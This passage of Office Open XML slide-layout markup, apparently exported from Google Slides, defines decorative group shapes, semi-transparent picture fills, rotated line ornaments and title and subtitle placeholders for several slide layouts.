            <a:alphaModFix amt="37000"/>
          </a:blip>
          <a:srcRect b="35662" l="0" r="38279" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1" rot="-5400000">
            <a:off x="6504175" y="2503664"/>
            <a:ext cx="2714875" cy="2564774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="872" name="Google Shape;872;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="307577" y="284738"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="873" name="Google Shape;873;p33"/>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874" name="Google Shape;874;p33"/>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875" name="Google Shape;875;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="223258" y="200303"/>
            <a:ext cx="2475898" cy="3086910"/>
            <a:chOff x="223258" y="1854600"/>
            <a:chExt cx="2475898" cy="3086910"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="876" name="Google Shape;876;p33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="877" name="Google Shape;877;p33"/>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33"/>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33"/>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33"/>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1" name="Google Shape;881;p33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1" rot="-5400000">
              <a:off x="-182085" y="2259943"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="882" name="Google Shape;882;p33"/>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33"/>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33"/>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33"/>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86" name="Google Shape;886;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="148226" y="3286075"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="887" name="Google Shape;887;p33"/>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33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="123656" y="840384"/>
              <a:ext cx="1857425" cy="173285"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="119713" w="1283195">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33"/>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33"/>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33"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="5143499"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144002" cy="5143499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="110" name="Google Shape;110;p5"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="7899750" y="4015901"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="111" name="Google Shape;111;p5"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="-75050" y="75050"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="112" name="Google Shape;112;p5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="113" name="Google Shape;113;p5"/>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114" name="Google Shape;114;p5"/>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115" name="Google Shape;115;p5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="1854600"/>
            <a:ext cx="7212384" cy="3086910"/>
            <a:chOff x="1727190" y="1854600"/>
            <a:chExt cx="7212384" cy="3086910"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="116" name="Google Shape;116;p5"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1">
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="117" name="Google Shape;117;p5"/>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5"/>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5"/>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5"/>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 name="Google Shape;121;p5"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1" rot="-5400000">
              <a:off x="8372951" y="2259943"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="530766"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="122" name="Google Shape;122;p5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7286403" y="530766"/>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5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6995146" y="530766"/>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5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6703889" y="530766"/>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5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6413465" y="530766"/>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6" name="Google Shape;126;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127" name="Google Shape;127;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5055284" y="36849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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583300" y="36849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9" name="Google Shape;129;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 name="Google Shape;130;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15830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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="5143499"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144002" cy="5143499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="133" name="Google Shape;133;p6"/>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134" name="Google Shape;134;p6"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-75050" y="2503675"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="136" name="Google Shape;136;p6"/>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137" name="Google Shape;137;p6"/>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138" name="Google Shape;138;p6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="139" name="Google Shape;139;p6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="140" name="Google Shape;140;p6"/>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6"/>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4" name="Google Shape;144;p6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="145" name="Google Shape;145;p6"/>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6"/>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6"/>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6"/>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49" name="Google Shape;149;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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="-1475"/>
            <a:ext cx="9144000" cy="4246924"/>
            <a:chOff x="0" y="-1475"/>
            <a:chExt cx="9144000" cy="4246924"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="152" name="Google Shape;152;p7"/>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53" name="Google Shape;153;p7"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="6429125" y="-1475"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="155" name="Google Shape;155;p7"/>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156" name="Google Shape;156;p7"/>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157" name="Google Shape;157;p7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="227666" y="1662599"/>
            <a:ext cx="7788989" cy="3276669"/>
            <a:chOff x="227666" y="1662599"/>
            <a:chExt cx="7788989" cy="3276669"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="158" name="Google Shape;158;p7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1" rot="-5400000">
              <a:off x="-177676" y="2067942"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="159" name="Google Shape;159;p7"/>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3" name="Google Shape;163;p7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="7044690" y="4777988"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="164" name="Google Shape;164;p7"/>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7"/>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8" name="Google Shape;168;p7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="272087" y="3395736"/>
            <a:ext cx="204551" cy="1747810"/>
            <a:chOff x="1089587" y="-1610"/>
            <a:chExt cx="204551" cy="1747810"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="169" name="Google Shape;169;p7"/>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3" name="Google Shape;173;p7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="8690726" y="-1477"/>
            <a:ext cx="204551" cy="1747810"/>
            <a:chOff x="1089587" y="-1610"/>
            <a:chExt cx="204551" cy="1747810"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="174" name="Google Shape;174;p7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="333591" y="785652"/>
              <a:ext cx="1747810" cy="173285"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="119713" w="1207468">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rot="-5400000">
              <a:off x="1103403" y="947525"/>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rot="-5400000">
              <a:off x="1103403" y="1081138"/>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rot="-5400000">
              <a:off x="1103403" y="1214751"/>
              <a:ext cx="45773" cy="73404"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="50711" w="31622">
                  <a:moveTo>
                    <a:pt x="31622" y="50712"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="31622" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="249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8" name="Google Shape;178;p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179" name="Google Shape;179;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1576450"/>
            <a:ext cx="4294800" cy="220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180" name="Google Shape;180;p7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5336950" y="1576450"/>
            <a:ext cx="3093900" cy="3027600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk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1" name="Shape 181"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="5143499"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144002" cy="5143499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="183" name="Google Shape;183;p8"/>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184" name="Google Shape;184;p8"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-75050" y="2503675"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="185" name="Google Shape;185;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="579525" y="261300"/>
            <a:ext cx="7980950" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="186" name="Google Shape;186;p8"/>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187" name="Google Shape;187;p8"/>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188" name="Google Shape;188;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7319840" y="4523368"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="189" name="Google Shape;189;p8"/>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3" name="Google Shape;193;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="1172390" y="458868"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="194" name="Google Shape;194;p8"/>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8" name="Google Shape;198;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1969250" y="1732800"/>
            <a:ext cx="5205300" cy="1677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99" name="Google Shape;199;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="140078" y="6"/>
            <a:ext cx="261257" cy="5143447"/>
            <a:chOff x="221120" y="-9"/>
            <a:chExt cx="454360" cy="3595559"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="200" name="Google Shape;200;p8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="667991" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490"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581446" y="-9"/>
              <a:ext cx="7489" cy="1304377"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1304377" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1304378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="130437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581446" y="1467312"/>
              <a:ext cx="7489" cy="762341"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="762341" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="762342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76234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581446" y="2411718"/>
              <a:ext cx="7489" cy="1183001"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1183001" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1183002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118300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504887" y="-9"/>
              <a:ext cx="7489" cy="1833943"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1833943" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1833943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="18339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504887" y="2066710"/>
              <a:ext cx="7489" cy="1528840"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1528840" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1528840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15288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442475" y="-9"/>
              <a:ext cx="7489" cy="1054974"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1054974" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1054975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="1266127"/>
              <a:ext cx="7489" cy="2328592"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2328592" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2328593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="232859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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="-9"/>
              <a:ext cx="7489" cy="2570513"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2570513" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2570514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25705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371741" y="2829052"/>
              <a:ext cx="7489" cy="766498"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="766498" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="766499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="7664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288525" y="-9"/>
              <a:ext cx="7489" cy="1514707"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1514707" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1514708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="151470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288525" y="1874670"/>
              <a:ext cx="7489" cy="1720049"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1720049" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1720049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="17200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221120" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489"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3" name="Shape 213"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="5143499"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144002" cy="5143499"/>
          </a:xfrm>
